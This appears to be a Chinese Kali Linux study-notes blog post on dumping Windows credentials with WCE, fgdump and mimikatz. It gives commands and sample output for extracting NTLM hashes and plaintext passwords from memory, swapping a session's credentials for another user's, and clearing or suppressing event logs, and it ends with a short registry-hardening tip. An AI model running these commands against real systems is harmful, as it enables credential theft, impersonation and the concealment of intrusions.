Kali linux 学习笔记(二十三)提权——几个好工具(WCE、fgdump、mimikatz) 2020.3.4
前言
windows身份认证过程如图所示
上一届提到的pwdump是从SAM database里读取
如果能从内存里读取
面临的防卫会低很多
1、WCE(windows credential editor)
- windows 内核中保存有密码明文副本,安全机制较低
- 需要管理员权限
- 工具默认在 kali 的 /usr/share/wce/wce-universal #通用格式是自动识别32位和64位
- 多用户登录目标主机
过程如下:
将wce拷贝到windows
cmd中:
C:\>wce-universal.exe -lv #查看登录用户0020B19D:user1:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0# 与 C:\>PwDump.exe localhost 结果相同C:\>wce-universal.exe -d 0020B19D #指定从内存里删除user1账号C:\>wce-universal.exe -lv #发现删除成功001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0C:\>wce-universal.exe -g passwd #计算密码对应的 HASH 值Password: passwdHashes: 91C7AE7122196B5EAAD3B435B51404EE:22315D6ED1A7D5F8A7C98C40E9FA2DECC:\>wce-universal.exe -w #读取内核中的明文密码user1\ICST-WINATT:123456user2\ICST-WINATT:123456test\ICST-WINATT:123456kevin\ICST-WINATT:123456NETWORK SERVICE\MSHOME:C:\>net user user1 111222 #修改内核中的密码C:\>wce-universal.exe -wuser1\ICST-WINATT:123456user2\ICST-WINATT:123456test\ICST-WINATT:123456kevin\ICST-WINATT:123456NETWORK SERVICE\MSHOME:# 发现内存里没有变化,当前内核中保存的值会在下次登录被读取出来C:\>wce-universal.exe -lv001E5D92:user2:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D40000C7CE:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0C:\>wce-universal.exe -i 001E5D92 -s kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4 #对 LUID 进行修改(将LUID改为匹配其他用户的用户名和密码)Changing NTLM credentials of logon session 001E5D92h to:Username: kevindomain: ICST-WINATTLMHash: 44EFCE164AB921CAAAD3B435B51404EENTHash: 32ED87BDB5FDC5E9CBA88547376818D4NTLM credentials successfully changed!C:\>wce-universal.exe -lv #再次查看发现已经被修改001E5D92:kevin:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4001B9220:test:ICST-WINATT:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4000003E4:ICST-WINATT$:MSHOME:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
防范手段:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
删除里面的
wdigest和tspka
不留空行
2、fgdump
在 kali 系统中可以找到 /usr/share/windows-binaries/fgdump/
放在 WinXP 中, 双击或在命令行执行 fgdump.exe 会自动生成三个文件,文件中保存着密码
3、mimikatz
在 kali 中的路径 /usr/share/mimikatz
大神级工具
放到win中
他的一些功能如下:
C:\Win32>mimikatz.exe#查看帮助是::mimikatz # ::standard - Standard module [Basic commands (does not require module name)]crypto - Crypto Modulesekurlsa - SekurLSA module [Some commands to enumerate credentials...]kerberos - Kerberos package module []privilege - Privilege moduleprocess - Process moduleservice - Service modulelsadump - LsaDump modulets - Terminal Server moduleevent - Event modulemisc - Miscellaneous moduletoken - Token manipulation modulevault - Windows Vault/Credential moduleminesweeper - MineSweeper modulenet -dpapi - DPAPI Module (by API or RAW access) [Data Protection application programming interface]busylight - BusyLight Modulesysenv - System Environment Value modulesid - Security Identifiers moduleiis - IIS XML Config modulerpc - RPC control of mimikatz mimikatz # privilege::Module : privilegeFull name : Privilege moduledebug - Ask debug privilege * *driver - Ask load driver privilegesecurity - Ask security privilegetcb - Ask tcb privilegebackup - Ask backup privilegerestore - Ask restore privilegesysenv - Ask system environment privilegeid - Ask a privilege by its idname - Ask a privilege by its namemimikatz # privilege::debug #提权mimikatz # sekurlsa::mimikatz # sekurlsa::logonPasswords #会看到很多用户信息mimikatz # sekurlsa::wdigestmimikatz # process::list #查看进程mimikatz # lsadump::sam #获取sam中的用户数据mimikatz # lsadump::cache mimikatz # ts::multirdp #xp默认只允许登录一个用户,这个指令可以并行开用户mimikatz # event::clear #清除日志mimikatz # event::drop #不再产生新日志mimikatz # misc::regedit #注册表编辑器mimikatz # token::whoami #token里有whoami功能
结语
这些个工具都蛮好用的
mimikatz功能很全
Kali linux 学习笔记(二十三)提权——几个好工具(WCE、fgdump、mimikatz) 2020.3.4相关推荐
- Kali linux 学习笔记(四十一)Web渗透——扫描工具之w3af 2020.3.18
前言 w3af (web application attack and audit framework) 基于python开发 发现和利用所有web应用程序漏洞 比较重量级 功能有: audit(审计 ...
- Kali Linux学习笔记—Web渗透(1)
Kali Linux学习笔记-WEB渗透 侦察 Httrack 扫描 Nikto vega skipfish w3af Arachni OWASP_ZAP 必须掌握 Burpsuite 必须掌握 实验 ...
- Kali Linux学习笔记—无线渗透 WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)
Kali linux 学习笔记 无线渗透--WPA攻击(PSK破解.AIROLIB.JTR.cowpatty.pyrit) PSK破解原理 PSK破解过程 实验步骤--使用字典rockyou.txt ...
- linux学习笔记二
linux学习笔记二 文章目录 linux学习笔记二 finding finding hyx@hyx-computer:~$ cd mnt -bash: cd: mnt: No such file o ...
- Cty的Linux学习笔记(十三)
Linux学习笔记--第十三篇 特殊字符: !!:连续两个"!"表示执行上一条指令 !n:n是数字,表示执行命令历史中的第n调指令 !字符串(字符串大于):执行命令历史中最近一次以 ...
- 2022自学kali linux学习笔记
关于密码的破解 在Linux上 /etc/passwd /etc/shadow 使用命令 unshadow 第一步 unshadow /etc/passwd /etc/shadow >test_ ...
- Kali linux 学习笔记(七十五)拒绝服务——teardrop 2020.4.15
前言 本节学习teardrop 很古老 利用IP分段偏移 1.简介 teardrop 主要针对早期微软操作系统(95.98.3.x.nt) 近些年有人发现对 2.x 版本的安卓系统.6.0 IOS 系 ...
- kali linux学习笔记
ARP欺骗:netfuck 需先安装wpcapinstall 来源ip就是目标要欺骗的ip 目标ip是本机网关 双向欺骗 爆破常见服务: smb telnet ftp 3389 mssql mysql ...
- Linux学习笔记二:Ubuntu启用root用户、更改软件源以及安装vim
目录 1. 概述 2. 启用root用户 3.更改软件源 4. 安装VIM 5. GCC编译hello.c文件 1. 概述 在上一章中我们在虚拟机中安装了Ubuntu系统,从这章开始,就正式在开启li ...
最新文章
- Disruptor技术调研之配置参数一览
- 参加“北向峰会”后对SOC之感言
- Jsp+Servlet+JavaBean经典MVC模式理解
- 类的大小,虚函数,继承
- 异常分发(内核异常)
- 向maven中央仓库提交jar
- 前端学习(2077):开始回顾
- 下载matlab安装包太慢_Matlab2017a软件安装包以及安装教程
- 听说你还不懂哈夫曼树和哈夫曼编码
- 黑圈数字符号0到50复制_电脑上怎么打出特殊符号「收藏」
- linux误删除 dev disk文件,误删除 linux 系统文件了?这个方法教你解决
- 基于VUE,VUX组件开发的网易新闻页面搭建过程
- linux实现快捷键,Linux Bash下如何实现快捷键效果
- 各种网页播放面板代码,MediaPlayer Replayer等
- 我的世界热力膨胀JAVA_我的世界1.12-1.6.4热力膨胀 Thermal Expansion Mod下载
- Python 多线程爬虫
- Android7.0编译出现问题(Failed to contact Jack server)
- RadiAnt DICOM Viewer 2022.2 BETA #25311
- 公共关系礼仪实务章节测试题——公共关系概述(四)
- 淘宝虚拟产品自动发货软件
热门文章
- AD10 层相关操作【视图从底层往顶层看】【层切换】【层切换的快捷键的使用】【 阻焊层solder与助悍层paste】【增加机械层】
- java 基础教程 ppt_java基础教程课件.ppt
- Unity3D基础案例-见缝插针
- 小金车系统可以实现从TXT库里添加用户
- streamlit TypeError: Plain typing.NoReturn is not valid as type argument
- 欢迎加入QQandroid群,群号【60591330】
- 转:我们时代的思想责任与尊严
- BestSync同步软件激活
- DPDK系列之二DPDK编译
- 【Python 3】SyntaxError: (unicode error) 'utf-8' codec can't decode byte 0xcf in position 0